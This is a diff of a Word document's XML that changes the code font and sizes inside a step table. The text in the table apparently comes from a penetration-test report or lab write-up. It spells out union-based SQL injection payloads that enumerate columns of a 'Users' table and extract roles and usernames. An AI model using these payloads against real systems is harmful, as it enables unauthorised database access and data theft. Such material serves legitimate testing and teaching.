           <w:p>
             <w:pPr>
@@ -9506,13 +10324,17 @@
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -9520,7 +10342,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -9528,7 +10352,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">, </w:t>
@@ -9536,7 +10362,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>column_name</w:t>
@@ -9544,7 +10372,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
@@ -9552,7 +10382,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>information_schema.columns</w:t>
@@ -9560,7 +10392,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> where </w:t>
@@ -9568,7 +10402,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9576,14 +10412,18 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>='Users'</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> having </w:t>
@@ -9591,7 +10431,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -9599,35 +10441,45 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>column_name</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>,1,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>)=BINARY '</w:t>
@@ -9635,7 +10487,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>api</w:t>
@@ -9643,7 +10497,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>' limit 1 --+</w:t>
@@ -9658,13 +10514,17 @@
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -9672,7 +10532,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -9680,7 +10542,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">, </w:t>
@@ -9688,7 +10552,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>column_name</w:t>
@@ -9696,7 +10562,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
@@ -9704,16 +10572,19 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:t>information_schema.columns</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> where </w:t>
@@ -9721,7 +10592,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9729,7 +10602,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">='Users' having </w:t>
@@ -9737,7 +10612,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -9745,7 +10622,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
@@ -9753,7 +10632,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>column_name</w:t>
@@ -9761,7 +10642,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>&lt;&gt;'</w:t>
@@ -9769,7 +10652,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>api</w:t>
@@ -9777,7 +10662,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>' limit 1 --+</w:t>
@@ -9798,7 +10685,6 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>In this step, all the column</w:t>
             </w:r>
             <w:r>
@@ -9942,7 +10828,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -9968,7 +10854,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -9979,13 +10865,17 @@
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -9993,7 +10883,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -10001,35 +10893,45 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>roles</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>Users</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> having </w:t>
@@ -10037,7 +10939,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -10045,49 +10949,63 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>roles</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>,1,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>)=BINARY '</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>user</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>' limit 1 --+</w:t>
@@ -10103,13 +11021,17 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -10117,7 +11039,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -10125,7 +11049,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">, roles from Users having </w:t>
@@ -10133,7 +11059,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -10141,7 +11069,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
@@ -10150,7 +11080,9 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -10237,7 +11169,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -10257,18 +11189,22 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -10277,7 +11213,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,roles</w:t>
@@ -10285,7 +11223,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>,username</w:t>
@@ -10293,14 +11233,18 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from Users having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
